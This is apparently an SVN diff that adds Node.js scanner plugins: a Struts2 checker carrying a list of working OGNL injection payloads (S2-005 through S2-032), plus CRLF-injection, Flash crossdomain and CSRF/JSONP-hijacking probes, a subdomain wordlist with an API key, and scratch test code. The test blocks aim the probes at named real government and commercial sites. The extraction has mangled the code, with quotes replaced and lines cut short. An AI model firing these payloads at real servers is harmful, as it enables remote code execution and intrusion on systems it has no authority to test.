/ chenyanpeng
项目语言:None
权限:read-only(如需更高权限请先加入项目)
chenyanpeng/
Index: struts2.js
===================================================================
--- struts2.js (revision 0)
+++ struts2.js (revision 34)
@@ -0,0 +1,108 @@
+const poc = require('../poc');
+const request = require('co-request');
+const co = require('co');
+const url_method = require('url');
+const payloads = [
[&S005&,&(%27\\43_memberAccess.allowStaticMethodAccess%27)(a)=true&(b)((%27\\43context[\\%27xwork.MethodAccessor.denyMethodExecution\\%27]\\75false%27)(b))&(%27\\43c%27)((%27\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET%27)(c))&(g)((%27\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()%27)(d))&(i2)((%27\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()%27)(d))&(i2)((%27\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()%27)(d))&(i95)((%27\\43xman.getWriter().println()%27)(d))&(i99)((%27\\43xman.getWriter().close()%27)(d))&],
[&S009&, &class.classLoader.jarPath=(%23context%5B\&xwork.MethodAccessor.denyMethodExecution\&%5D%3D%20new%20java.lang.Boolean(false)%2C%20%23_memberAccess%5B\&allowStaticMethodAccess\&%5D%3Dtrue%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23outstr%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23outstr.println()%2C%23outstr.close())(meh)&z[(class.classLoader.jarPath)(%27meh%27)]&],
[&S013&, &a=1${(%23_memberAccess[\&allowStaticMethodAccess\&]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23k8out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23k8out.println(),%23k8out.close())}&],
[&S016&, &redirect:$%7B%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println()%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D&],
[&S019&, &debug=command&expression=(%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS)%3F((%23writ%3D(%23attr%5B%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%5D).getWriter())%2C%23writ.println()%2C%23writ.close())%3A1&],
[&S032&, &method:%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2C%23matt%3D%23attr.get(%23parameters.com[0]%2b%23parameters.com1[0])%2C%23matt.getWriter().println()%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%2C1%3F%23xx%3A%23request.toString&com=com.opensymphony.xwo&com1=rk2.dispatcher.HttpServletResponse&]
+var checkExtension=function(data){
var parts = url_method.parse(data.url);
allow_extensions = ['.do', '.action', '.jsp', '.jhtml', '.xhtml', '.json']; // 后缀检测
for(var i in allow_extensions){
var item=allow_extensions[i];
if(data.url.indexOf(item) != -1){
+var checkStruts2=function* (option){
var url=option.
var host=option.
var method=option.method.toUpperCase();
var data=option.
var parts = url_method.parse(url);
var simple_url= parts.protocol+'//'+ parts.host+ parts.
var vulns = yield payloads.map(function* (payload_data){
let virus_url=simple_url+&?&+payload_data[1];
if(method == &GET&){
resp = yield request({
uri:virus_url,
method:'GET',
followRedirect:false,
timeout:3000
resp = yield request({
uri:virus_url,
method:'POST',
formData:data,
followRedirect:false,
timeout:3000
if((JSON.stringify(resp)).indexOf(&&) != -1){
&type&: &Vuln&,
&title&:payload_data[0]+& Struts2 Vuln&,
&level&:'high',
&type&:'Struts2',
&details&: {&url& : simple_url,
&method& : method,
&payload& : payload_data[1]
+poc.on('Url',(data, submit, done)=&{
co(function* (){
if(checkExtension(data)){
var result=yield checkStruts2(data);
if(result != null && result.length&0){
submit(result);
}).catch(function (err) {
+if(poc.iscmd){
var data ={
&netloc&: &www.zg.gov.cn&,
&task_id&: &3&,
&title&: null,
&url&: &http://dzfp.he-n-tax.gov.cn/dzfpFpywQery.do&,
&charset&: &tf-8&,
&headers&: {
&content-length&: &7245&,
&x-powered-by&: &ASP.NET&,
&x-aspnet-version&: &2.0.50727&,
&server&: &Microsoft-IIS/6.0&,
&cache-control&: &private&,
&date&: &Th, 12 May :10 GMT&,
&content-type&: &text/ charset=tf-8&
&data&: {},
&method&: &get&
poc.emit(&Url&,data,u=&{console.log(&struts2 test end with info:
&+JSON.stringify(u))},console.log());
+module.exports =
\ No newline at end of file
Index: flash-csrf.js
===================================================================
--- flash-csrf.js (revision 0)
+++ flash-csrf.js (revision 34)
@@ -0,0 +1,55 @@
+const emitter = new (require('events'))();
+const co = require('co');
+const request = require('co-request');
+const path = require('path');
+const argv = require('yargs')
.boolean('dev')
+const isdev = !module.parent || argv.
+const iscmd = !module.
var basename = path.basename(__filename,'.js');
if(isdev){
var cfg = require(`${__dirname}/${basename}.dev.json`);
var cfg = require(`${__dirname}/${basename}.json`);
+}catch(e){
+var submit = (title,rank,details)=&{
var vuln = {title,rank,details};
if(module.parent){
emitter.emit('Vuln',vuln);
console.log(vuln);
+exports.emitter =
+exports.on = emitter.on.bind(emitter);
+exports.emit = emitter.emit.bind(emitter);
+exports.name = 'FlashCSRF';
+exports.author = 'jackmasa';
+emitter.on('Host',(data, submit, done)=&{
co(function*(){
var resp = yield request(`http://${data.hostname}:${data.port}/crossdomain.xml`);
if(resp.body.indexOf('domain=&*&')!=-1){
submit('Flash CSRF', 4,{
desc:'This is a Flash CSRF vulnerability.',
url:resp.request.uri.href
.catch(err=&{
console.error(err.stack);
+if(iscmd){
emitter.emit('Host',{hostname:'bo.xianguo.com',port:80});
\ No newline at end of file
Index: crlfInjection.js
===================================================================
--- crlfInjection.js (revision 0)
+++ crlfInjection.js (revision 34)
@@ -0,0 +1,136 @@
+const poc = require('../poc');
+const request = require('co-request');
+const co = require('co');
+const url_method = require('url');
+var randomString=function(len) {
len = len || 32;
var $chars = 'ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz;;
/****默认去掉了容易混淆的字符oOLl,9gq,Vv,Uu,I1****/
var maxPos = $chars.
var pwd = '';
for (i = 0; i & i++) {
pwd += $chars.charAt(Math.floor(Math.random() * maxPos));
+var is_json=function(obj){
var isjson = typeof(obj) == &object& && Object.prototype.toString.call(obj).toLowerCase() == &[object object]& && !obj.
+var isCRLFInjection=function* (obj){
var keyword = randomString(15);
var vulns = [];
var parts = url_method.parse(obj.url,true);
var payloads = [&%0D%0A& + keyword, &%0A& + keyword];
if(parts.query && JSON.stringify(parts.query).length&2){
for(var key in parts.query){
for(var i in payloads){
var url_tmp=obj.url+&&;
url_tmp=url_tmp.replace(key+&=&+parts.query[key],key+&=&+parts.query[key]+payloads[i]);
uri:url_tmp,
followRedirect:false,
timeout:6000
if(obj.method.toLowerCase()==&get&){
opt.method=&get&;
opt.method=&post&;
opt.formData=obj.
var resp=yield request(opt);
if(JSON.stringify(resp.headers).indexOf(keyword) != -1){
vulns.push({
'type': &Vuln&,
'data': {
'title': &{} CRLF Injection &+obj.url,
'level': &medium&,
'type': &CRLF Injection&,
'details': {
'url':obj.url,
'method':obj.method,
'payload':payloads[i],
'param':key
if(obj.data && JSON.stringify(obj.data).length&2 && is_json(obj.data) && obj.method.toLowerCase()==&post&){
for(var key in obj.data){
for(var i in payloads){
var testdata=JSON.parse(JSON.stringify(obj.data)+&&);
obj.data[key]=obj.data[key]+payloads[i];
uri:obj.url,
followRedirect:false,
timeout:3000,
method:'post',
formData:testdata
var resp=yield request(opt);
if(JSON.stringify(resp.headers).indexOf(keyword) != -1){
vulns.push({
'type': &Vuln&,
'data': {
'title': &{} CRLF Injection &+obj.url,
'level': &medium&,
'type': &CRLF Injection&,
'details': {
'url':obj.url,
'method':obj.method,
'payload':payloads[i],
'param':key
+poc.on('Url',(data, submit, done)=&{
co(function* (){
var result=yield isCRLFInjection(data);
if(result != null && result.length&0){
submit(result);
}).catch(function (err) {
+if(poc.iscmd){
var data = {
&netloc&: &gk.chengdu.gov.cn&,
&task_id&: &3&, &title&: null,
&url&: &http://gk.chengdu.gov.cn/govInfoPub/detail.action?id=84636&tn=6&,
&charset&: &utf-8&,
&headers&: {
&content-length&: &7245&,
&x-powered-by&: &ASP.NET&,
&x-aspnet-version&: &2.0.50727&,
&server&: &Microsoft-IIS/6.0&,
&cache-control&: &private&,
&date&: &Thu, 12 May :10 GMT&,
&content-type&: &text/charset=utf-8&
&data&: {},
&method&: &GET&
poc.emit(&Url&,data,u=&{console.log(&csrfi test end with info:
&+JSON.stringify(u))},console.log());
+module.exports =
\ No newline at end of file
Index: csrf.js
===================================================================
--- csrf.js (revision 0)
+++ csrf.js (revision 34)
@@ -0,0 +1,513 @@
+const poc = require('../poc');
+const url_method = require('url');
+const co = require('co');
+const request = require('co-request');
+var needCheckPost =
+var standardOutput =
+ * 仿照python中re.escape函数
+ * python中，空格转换成了\空格，我这里转换的是\s
+ * @param str
+ * @returns {string}
+var escape=function(str){
var wn=&abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ&;
var rs=&&;
for(var i=0;i&str.i++){
if(wn.indexOf(str.charAt(i)) == -1) {
if (str.charAt(i) == ' ') {
rs = rs + &\\s&;
rs = rs + &\\& + str.charAt(i);
rs=rs+str.charAt(i);
+ * 判断返回内容是否是json
+ * @param obj
+ * @returns {boolean}
+var is_json=function(obj){
var isjson = typeof(obj) == &object& && Object.prototype.toString.call(obj).toLowerCase() == &[object object]& && !obj.
+ * 判断是否是javascript,并且不是静态的javascript文件(例如jquery)
+ * @param obj
+ * @returns {boolean}
+var is_nonstatic_javascript=function(obj){
//说明是静态javascript文件，则排除
if(&last-modified& in obj.headers){
if(&content-type& in obj.headers){
var content_type=obj.headers[&content-type&];
var mimes = [&text/javascript&, &text/x-javascript&, &application/javascript&, &application/x-javascript&];
var result=
for(var i in mimes){
var mime=mimes[i].toUpperCase();
if((content_type.toUpperCase()).indexOf(mime) !=-1){
+ * 判断是否含有敏感信息
+ * @param obj
+ * @returns {boolean}
+var has_sensitive_info=function(obj){
if (standardOutput == null){
var senses = [&username&, &nick&, &userid&, &uin&, &password&, &mail&, &\btel\b&, &\buid\b&, &phone&, &displayname&,
&logininfo&];
var str=standardOutput.toLowerCase();
for (var i in senses){
var sense=senses[i];
if(str.indexOf(sense) != -1){
+ * 判断是否是jsonp
+ * @param obj
+ * @returns {boolean}
+var is_jsonp=function* (obj){
var index= obj.url.indexOf(&?&);
if(obj.method.toLowerCase() == 'get' && index != -1){
var query=obj.url.substring(index+1,obj.url.length);
var options={
timeout:3000,
uri:obj.url,
method:&get&
var resp=yield request(options);
if(resp !=null && resp.statusCode == 200){
var res = resp.body.replace(/(^\s*)|(\s*$)/g,'');
var matched = res.match(new RegExp(/^[\w.\$]+\s*\(\s*([\s\S]+?)\s*\)\s*;?$/,'i'));
if(matched == null){
matched = res.match(new RegExp(/^(?:var)?\s*[\w.\$]+\s*=\s*([\s\S]+?);?$/,'i'));
if(matched != null){
return is_json(matched[1]);
+ * 判断是否含有cors返回头为*的情况
+ * @param obj
+ * @returns {boolean}
+var is_cors_open=function(obj){
console.log('cors');
if(&access-control-allow-origin& in obj.headers && (obj.headers[&access-control-allow-origin&]).replace(/(^\s*)|(\s*$)/g,'') ==&*&){
判断token是否有效
+ * @param obj
+ * @param token_name
+ * @param with_cookie_token
+ * @returns {boolean}
+var is_token_valid=function* (obj,token_name,with_cookie_token){
if(standardOutput){
var parts = url_method.parse(obj.url);
var hostname = parts.
var protocol = parts.
var referer = protocol + &//& + hostname + &/&;
let tmp_result=
let fake_token = &123456&;
let headers = {
&Referer&: referer
if(with_cookie_token){
headers.Cookie=token_name + &=& + fake_
let options={
timeout:3000,
uri:obj.url,
method:&POST&,
headers:headers
if(obj.method.toUpperCase() == &GET&){
let tmp_url=obj.
tmp_url=tmp_url.replace(new RegExp(escape(token_name)+&=[^&#]*&,&g&),token_name + &=& + fake_token);
options.method=&GET&;
options.uri=tmp_
}else if(obj.method.toUpper() == &POST&){
let tmp_postdata = JSON.parse(JSON.stringify(obj.data));
tmp_postdata[token_name] = fake_
options.formData=tmp_
var rep=yield request(options);
if(rep ==null || rep.statusCode != 200){
if(rep.body == standardOutput){
+ * 判断当前请求是否含有token，并且判断token的有效性
+ * @param obj
+ * @returns {*}
+var has_token=function* (obj){
let token_names = [&token&, &csrf&, &gtk&, &bkn&, &code&];
let token_param =
let params={};
obj.url.replace(/[?&]+([^=&]+)=([^&]*)/gi,
function(m,key,value) {
params[key] =
for(let i in token_names){
let item=token_names[i];
for(let j in params){
if(j!=null && j.toLowerCase().indexOf(item) != -1){
token_param=j;
if(obj.data != null &&　obj.data.length & 0){
let params=obj.
for(let k in params){
if(k != null && k.toLowerCase().indexOf(item) != -1){
token_param=params[k];
if(token_param == null){
let is_token_valided=yield is_token_valid(obj,token_names,false);
if(!is_token_valided){
return &token_invalid&;
is_token_valided=yield is_token_valid(obj,token_names,true);
if(!is_token_valided){
return &token_check_in_cookie&;
+ * 带refer请求某个url
+ * @param obj
+ * @param refer
+ * @returns {*}
+var req_with_referer=function* (obj,refer){
console.log('refer');
var options={
timeout:3000,
uri:obj.url,
method:&get&
if(refer != null && refer.length&0){
options.headers={
&Referer&: refer
if(obj.method.toLowerCase() == &get&){
options.method=&get&;
}else if(obj.method.toLowerCase() == &post&){
options.method=&post&;
options.formData=obj.
var resp=yield request(options);
if(resp !=null && resp.statusCode == 200 ){
+ * 判断请求是否判断了referer
+ * @param obj
+ * @returns {*}
+var has_referer_check=function* (obj){
var parts = url_method.parse(obj.url);
var hostname = parts.
var protocol = parts.
var referers = [protocol + &//& + hostname + &/&, protocol + &//abdasdahkcndhjda.com/&, &&,
protocol + &//& + hostname + &.abdasdahkcndhjda.com/&];
var rs=yield referers.map(v=&req_with_referer(obj,v));
if(rs != null && rs.length & 0){
let count = 0;
let allows = [];
for(let i in rs){
let item=rs[i];
if( count == 0){
if(item == null || item.length==0){
standardOutput = item.
if( count == 1 && standard.text == item.text){
allows.push(&allow-any-referer&);
if( count == 2 && standard.text == item.text){
allows.push(&allow-null-referer&);
if( count == 3 && standard.text == item.text){
allows.push(&allow-prefix-referer&);
count = count + 1;
+ * 构建检测流程
+ * @param obj
+ * @returns {*}
+var flow=function* (obj){
var result = [];
if(!needCheckPost && obj.method.toLowerCase() == 'post'){
let token_result=yield has_token(obj);
if(token_result == null){
var temp={
'type': &Vuln&,
'data': {
&type&:'CSRF',
&title&:'Post-type CSRF Vulnerability',
&detail&:{
'url': obj.url,
'info':'May be a Post-type CSRF Vulnerability, need to verify further'
result.push(temp);
var ref_check =yield has_referer_check(obj);
if(ref_check != null){
if(is_cors_open(obj)){
var temp={
'type': &Vuln&,
'data': {
&type&:'CSRF',
&title&:'Access-Control-Allow-Origin is set to * ',
&detail&:{
'url': obj.url,
'info': 'Access-Control-Allow-Origin is set to * , lead to information leakage'
result.push(temp);
var is_jsonp_rs=yield is_jsonp(obj);
if(is_jsonp_rs){
let token_result =yield has_token(obj);
if(token_result == null){
var temp={
'type': &Vuln&,
'data': {
&type&:'CSRF',
&title&:'JSONP Hijacking',
&detail&:{
'url': obj.url,
'info': 'JSONP Hijacking, lead to information leakage'
result.push(temp);
}else if(token_result == 'token_invalid'){
var temp={
'type': &Vuln&,
'data': {
&type&:'CSRF',
&title&:'JSONP Hijacking with invalid csrf token',
&detail&:{
'url': obj.url,
'info':'JSONP Hijacking, lead to information leakage'
result.push(temp);
}else if(token_result == 'token_check_in_cookie'){
var temp={
'type': &Vuln&,
'data': {
&type&:'CSRF',
&title&:'Possible JSONP Hijacking (need an arbitrary cookie write)',
&detail&:{
'url': obj.url,
'info':'JSONP Hijacking, lead to information leakage'
result.push(temp);
if(obj.method.toLowerCase() == 'get' && is_nonstatic_javascript(obj) && has_sensitive_info(obj)){
var temp={
'type': &Vuln&,
'data': {
&type&:'CSRF',
&title&:'Javascript-Hijacking Vulnerability',
&detail&:{
'url': obj.url,
'info':'Javascript-Hijacking Vulnerability, lead to cross site information leakage'
result.push(temp);
if(obj.method.toLowerCase() == 'post'){
let token_result =yield has_token(obj);
if(token_result == null ){
var temp={
'type': &Vuln&,
'data': {
&type&:'CSRF',
&title&:'Post-type CSRF Vulnerability',
&detail&:{
'url': obj.url,
'post': obj.data,
'info':'Post-type CSRF Vulnerability, lead to cross site information manipulation'
result.push(temp);
}else if(token_result == 'token_invalid'){
var temp={
'type': &Vuln&,
'data': {
&type&:'CSRF',
&title&:'Post-type CSRF Vulnerability with invalid csrf token',
&detail&:{
'url': obj.url,
'post': obj.data,
'info':'Post-type CSRF Vulnerability, lead to cross site information manipulation'
result.push(temp);
}else if(token_result == 'token_check_in_cookie'){
var temp={
'type': &Warning&,
'data': {
&type&:'CSRF',
&title&:'Possible Post-type CSRF Vulnerability (need an arbitrary cookie write)',
&detail&:{
'url': obj.url,
'post': obj.data,
'info':'Post-type CSRF Vulnerability, lead to cross site information manipulation'
result.push(temp);
//else end
+poc.on('Url',(data, submit, done)=&{
co(function* (){
var result=yield flow(data);
if(result != null && result.length&0){
submit(result);
}).catch(function (err) {
+if(poc.iscmd) {
var data = {
&netloc&: &comment.money.163.com&,
&task_id&: &3&, &title&: null,
&url&: &http://comment.money.163.com/reply/check.jsp?time=4&callback=e163_comment&,
&charset&: &utf-8&,
&headers&: {
&content-length&: &7245&,
&x-powered-by&: &ASP.NET&,
&x-aspnet-version&: &2.0.50727&,
&server&: &Microsoft-IIS/6.0&,
&cache-control&: &private&,
&date&: &Thu, 12 May :10 GMT&,
&content-type&: &text/charset=utf-8&
&data&: {},
&method&: &GET&
poc.emit(&Url&,data,u=&{console.log(&csrf test end with info:&+JSON.stringify(u))},console.log.bind(console));
+module.exports =
\ No newline at end of file
Index: xssucks.dev.json
===================================================================
--- xssucks.dev.json (revision 0)
+++ xssucks.dev.json (revision 34)
@@ -0,0 +1,3 @@
&splash&:&http://127.0.0.1:8050/render.html&
\ No newline at end of file
Index: empty.js
===================================================================
--- empty.js (revision 0)
+++ empty.js (revision 34)
@@ -0,0 +1,256 @@
+&use strict&;
+var url = require('url');
+let co = require(&co&);
+let request = require(&co-request&);
+let requests = require(&request&);
+let fs=require(&fs&);
+var async = require(&async&);
+var s=&1&;
+const https = require('https');
+const url_method = require('url');
var options = {
hostname: 'www.baidu.com',
path: '/s?wd=node%20https%20get请求&rsv_spt=1&rsv_iqid=0xfa1e220c&issp=1&f=3&rsv_bp=1&rsv_idx=2&ie=utf-8&rqlang=cn&tn=baiduhome_pg&rsv_enter=1&oq=node%20https&rsv_t=3bc0XkIRUnk5eC5zLFwnDnLzm0ht9GIQPAfICPUOcw0ACpSSMp28lun7du%2BMV5Isy70y&rsv_pq=bf89&rsv_sug3=23&rsv_sug1=21&rsv_sug7=100&rsv_sug2=1&prefixsug=node%20https%20&rsp=1&rsv_sug4=2576',
method: 'GET'
var req = https.request(options, (res) =& {
// console.log('statusCode:', res.statusCode);
//console.log('headers:', res.headers);
req.end();
req.on('error', (e) =& {
//console.error(e);
+var func=function* () {
// You can also pass options object, see http://github.com/mikeal/request docs
let result = yield request(&http://baidu.com&);
let response =
let body = result.
//console.log(&http://baidu.com&);
//console.log(&Response: &, response);
console.log(&Body: &, body);
+var read=function (url){
return fs.readFile(url,&utf8&,(error,data)=&{
console.log(&c&);
//console.log(data);
+function readFile(filename) {
return function(callback) {
fs.readFile(filename, 'utf8', callback);
+function tt(){
return function(callback){
callback(null,&hello &+request(&http://baidu.com&).toString());
+co(function*(){
//console.log(&a&);
//yield ss=func();
//console.log(ss);
//read('D:/socket_file/job/.txt');
//return yield func();
+}).then(result=&{
//console.log(&111&);
//console.log(result);
+//co(func());
+co(function* (){
var s1=yield readFile('D:/socket_file/job/.txt');
//console.log(s1);
+var tx=function*(){
+co(function* (){
var s1=yield tt();
//console.log(&s1=&+s1);
return yield tx();
+}).then(res=&{
//console.log(res);
+co(function* () {
let response = yield request({
uri:'https://www.alitrip.com/?spm=a21bo..9.LMPJpv',
method:'GET'
let body = response.
//console.log('Response: ', response);
//console.log('Body: ', body);
+}).catch(function (err) {
console.err(err);
+//console.log(&**********************************&);
+//console.log(&urlparse=&+JSON.stringify(url.parse(&http://xsst.sinaapp.com/xss/ext/4.php?sid=ktqO7DjMQcJuAABQ&t=dm_loginpage&)));
+function testCo(){
co(function* () {
yield func();
yield func();
yield func();
yield func();
console.log(&*****************co2*****************&);
console.log(&*****************co3*****************&);
+function* testCo_1(){
i=&********************co**********************&;
console.log(i);
+//testCo();
+var headers = {
&Referer&: &soso&,
+if(true){
headers.Cookie=&Cookie&;
+console.log(headers.Cookie);
+console.log(headers[&Cookie&]);
+var bbs=JSON.parse(JSON.stringify(headers.test));
+bbs.a=&bbs Cookie&;
+console.log(headers[&test&].a);
+console.log(bbs[&a&]);
+function testcb(callback){
requests({
uri:&http://localhost:8080/blog_system/duanzi.do&,
formData:{&test&:&test&},
method:&post&,timeout:30000
},function(error, response, body){
console.log(&s5s5s5**********&+JSON.stringify(response));
callback(null,response.body);
+function testw(callbacks){
async.waterfall([
function(callback){
testcb(callback);
console.log(&1&);
//callback(null,rs);
},function(rs,callback){
callbacks(null,rs);
testcb(callback);
console.log(&2&);
},function(rs,callback){
testcb(callback);
console.log(&3&);
],function(err, results){
console.log(&4&);
console.log(&---------&+results);
callbacks();
+async.waterfall([
function(callback){
async.waterfall([
function(in_cb){
callback(null,&db wtf&);
},function(in_cb){
],function(err,rs){
console.log(&sss***sss/***sss***sss&);
},function(rs,callback){
console.log(&sssssssss************&+rs);
callback();
callback();
}],function(err,rs){
console.log(&sssssssss************&+rs);
+var res=&/* dsfjsk */dsfsf&;
+res=res.replace(/^\/\*[\s\S]*?\*\//, &&);
+console.log(&/*****
+res = 'VAR a={&b&:1,&a&:2};'
+var rex=new RegExp(/^(?:var)?\s*[\w.\$]+\s*=\s*([\s\S]+?);?$/,'i');
+console.log(&*/**//*/*/
&+res.match(rex));
+var match=res.match(rex);
+console.log(&match *********** &+match[1]);
+function escape(str){
var wn=&abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ&;
var rs=&&;
for(var i=0;i&str.i++){
if(wn.indexOf(str.charAt(i)) == -1) {
if (str.charAt(i) == ' ') {
rs = rs + &\\s&;
console.log(&sss**************ss&);
rs = rs + &\\& + str.charAt(i);
rs=rs+str.charAt(i);
+var se=&token
named#@$#%ss&.match(new RegExp(escape(&token
named#@$#%&)));
+console.log(&**************************************&+se[1]);
+var hd={&content-length&: &7245&,
&x-powered-by&: &ASP.NET&,
&x-aspnet-version&: &2.0.50727&,
&server&: &Microsoft-IIS/6.0&,
&cache-control&: &private&,
&date&: &Th, 12 May :10 GMT&,
&content-type&: &text/ charset=tf-8;&};
+if(&x-powered-by& in hd){
console.log(hd[&x-powered-by&])
+function testasync(){
var parts = url_method.parse(&http://www.mindai.com/prodct/borrow_content_replay.action&);
var hostname = parts.
var protocol = parts.
var referers = [protocol + &//& + hostname + &/&, protocol + &//abdasdahkcndhjda.com/&, &&,
protocol + &//& + hostname + &.abdasdahkcndhjda.com/&];
var temp=&&;
async.mapLimit(referers,20, function(item, callback) {
// console.log(&forEachSeries ************ &+item);
temp=temp+& --*-- &+
callback(null,item);
},function(err,rs){
// console.log(&forEachSeries ------************----------- &+rs[3]);
+testasync();
+var tmp_url=&http://localhost:8080/blog_system/article.html?text_id=t13513&text_id=gfhf&;
+var token_name=&text_id&;
+var fake_token=&robert&;
+tmp_url=tmp_url.replace(new RegExp(escape(token_name)+&=[^&#]*&,&g&),token_name + &=& + fake_token);
+console.log(tmp_url);
\ No newline at end of file
Index: subdomain.json
===================================================================
--- subdomain.json (revision 0)
+++ subdomain.json (revision 34)
@@ -0,0 +1,11 @@
&chaofeng&:{
&API&:&http://lol.xlixli.net:9999/api/search&,
&email&:&masa.&,
&key&:&c43fb5d7ebb7125cxdiewz&
&sub&:[&www&,&mail&,&ftp&,&smtp&,&pop&,&m&,&webmail&,&pop3&,&imap&,&localhost&,&autodiscover&,&admin&,&bbs&,&test&,&mx&,&en&,&email&,&wap&,&blog&,&oa&,&ns1&,&vpn&,&ns2&,&www2&,&mysql&,&webdisk&,&dev&,&old&,&news&,&calendar&,&shop&,&potala&,&sip&,&mobile&,&mobilemail&,&web&,&ns&,&cpanel&,&www1&,&whm&,&new&,&img&,&search&,&mail2&,&support&,&media&,&files&,&e&,&video&,&app&,&secure&,&my&,&crm&,&intranet&,&portal&,&demo&,&fax&,&api&,&beta&,&images&,&dns&,&db&,&lyncdiscover&,&staging&,&info&,&docs&,&static&,&download&,&ns3&,&forum&,&cms&,&www3&,&cdn&,&pda&,&dns1&,&wiki&,&online&,&home&,&webproxy&,&mail1&,&lists&,&dns2&,&proxy&,&t&,&get&,&d&,&b2b&,&cn&,&store&,&cs&,&community&,&services&,&health&,&wx&,&service&,&remote&,&help&,&vip&,&finance&,&owa&,&apps&,&login&,&s&,&sc&,&events&,&stats&,&forums&,&data&,&jobs&,&it&,&survey&,&hr&,&sms&,&stage&,&member&,&i&,&a&,&v&,&ww&,&live&,&send&,&go&,&gateway&,&chat&,&dialin&,&ftp2&,&library&,&w&,&3g&,&hk&,&blogs&,&image&,&down&,&msoid&,&fr&,&english&,&av&,&so&,&erp&,&cp&,&legacy&,&ad&,&ldap&,&archive&,&alumni&,&connect&,&lib&,&sites&,&job&,&ask&,&sso&,&office&,&gis&,&pic&,&edu&,&ns4&,&start&,&training&,&soft&,&photo&,&es&,&ads&,&tv&,&game&,&sz&,&im&,&security&,&upload&,&de&,&meet&,&gmail&,&ssh&,&exchange&,&cloud&,&hq&,&downloads&,&access&,&extranet&,&ns5&,&careers&,&helpdesk&,&direct&,&rs&,&sp&,&netmang&,&zb&,&sx&,&ss&,&ms&,&qa&,&dj&,&svn&,&project&,&jp&,&file&,&ent&,&feeds&,&club&,&dl&,&ws&,&book&,&update&,&gb&,&dx&,&b&,&js&,&videos&,&sh&,&outlook&,&software&,&ir&,&press&,&cq&,&tw&,&meeting&,&auth&,&content&,&git&,&monitor&,&photos&,&backup&,&c&,&gw&,&cx&,&ssl&,&pt&,&mall&,&research&,&techmang&,&biz&,&mang&,&bj&,&music&,&w3&,&ca&,&map&,&ru&,&ntp&,&x&,&share&,&vpn2&,&relay&,&jw&,&jk&,&citrix&,&tp&,&gh&,&weather&,&feedback&,&us&,&server&,&auto&,&reports&,&p&,&cc&,&newsletter&,&travel&,&spam&,&manage&,&mx1&,&partner&,&link&,&digital&,&ts&,&dm&,&fs&,&brand&,&business&,&uc&,&alpha&,&tuan&,&stat&,&mdm&,&code&,&br&,&members&,&st&,&marketing&,&partners&,&g&,&stream&,&tr&,&money&,&abc&,&user&,&sharepoint&,&vote&,&origin&,&pms&,&wh&,&education&,&pub&,&design&,&wwww&,&math&,&cj&,&radio&,&car&,&1&,&tj&,&mailhost&,&vc&,&host&,&wt&,&student&,&tools&,&u&,&status&,&hb&,&uk&,&tz&,&metrics&,&hd&,&mx2&,&bm&,&www4&,&IN&,&food&,&as&,&lab&,&dns3&,&cnc&,&hs&,&projects&,&preview&,&buy&,&games&,&public&,&groups&,&res&,&forms&,&open&,&th&,&house&,&labs&,&global&,&f&,&youth&,&fz&,&cm&,&cache&,&xx&,&mssql&,&lt&,&sg&,&event&,&vpn1&,&sys&,&sales&,&local&,&jj&,&da&,&time&,&bugs&,&gallery&,&mail3&,&wp&,&show&,&social&,&ja&,&pm&,&china&,&promo&,&sq&,&web1&,&corp&,&accounts&,&register&,&ce&,&jd&,&maps&,&wl&,&corporate&,&tour&,&rtx&,&adm&,&list&,&rss&,&developer&,&web2&,&temp&,&ps&,&q&,&cas&,&smtp2&,&hao&,&tech&,&ra&,&usa&,&bb&,&art&,&client&,&investor&,&jwc&,&kr&,&css&,&sandbox&,&exam&,&pro&,&sports&,&registration&,&doc&,&push&,&manager&,&cw&,&mars&,&au&,&id&,&special&,&ee&,&webservices&,&mm&,&edm&,&eq&,&prod&,&eng&,&in&,&ml&,&life&,&conference&,&sts&,&work&,&zw&,&net&,&staff&,&idp&,&linux&,&weixin&,&bi&,&cf&,&hotel&,&sql&,&mis&,&lp&,&mailgw&,&catalog&,&sy&,&fw&,&sj&,&agent&,&dc&,&space&,&mrtg&,&fx&,&directory&,&webdev&,&jira&,&flash&,&rsc&,&kb&,&view&,&dy&,&tg&,&site&,&ams&,&rms&,&ticket&,&card&,&www0&,&apple&,&rt&,&sd&,&reg&,&www5&,&irc&,&dk&,&bt&,&account&,&ems&,&students&,&cl&,&ly&,&0&,&pages&,&be&,&inside&,&dms&,&assets&,&phx&,&shopping&,&union&,&gc&,&android&,&pos&,&pc&,&test2&,&customer&,&ec&,&wireless&,&log&,&sns&,&sf&,&hy&,&ic&,&ks&,&cd&,&mobi&,&tu&,&ag&,&dz&,&ga&,&pe&,&webcast&,&mp&,&mailgate&,&cz&,&ids&,&acs&,&nl&,&chem&,&smtp1&,&pp&,&click&,&w2&,&pay&,&pl&,&jabber&,&2&,&atlas&,&love&,&shanghai&,&wb&,&em&,&movie&,&ls&,&cert&,&dw&,&yp&,&wms&,&sync&,&me&,&zp&,&order&,&xml&,&storage&,&hz&,&bz&,&server1&,&cwc&,&edge&,&ww2&,&history&,&dt&,&ftp1&,&mb&,&testing&,&pr&,&ac&,&imp&,&mkt&,&gate&,&ci&,&star&,&zz&,&ns0&,&y&,&ds&,&s1&,&dev1&,&xf&,&gd&,&mercury&,&law&,&sl&,&ph&,&test1&,&sk&,&gs&,&trac&,&act&,&cgi&,&development&,&ar&,&edi&,&kf&,&edit&,&jupiter&,&golf&,&affiliate&,&nc&,&rd&,&se&,&hub&,&market&,&asp&,&xb&,&archives&,&fc&,&streaming&,&bg&,&intra&,&product&,&daj&,&fb&,&sb&,&ch&,&fm&,&keys&,&stock&,&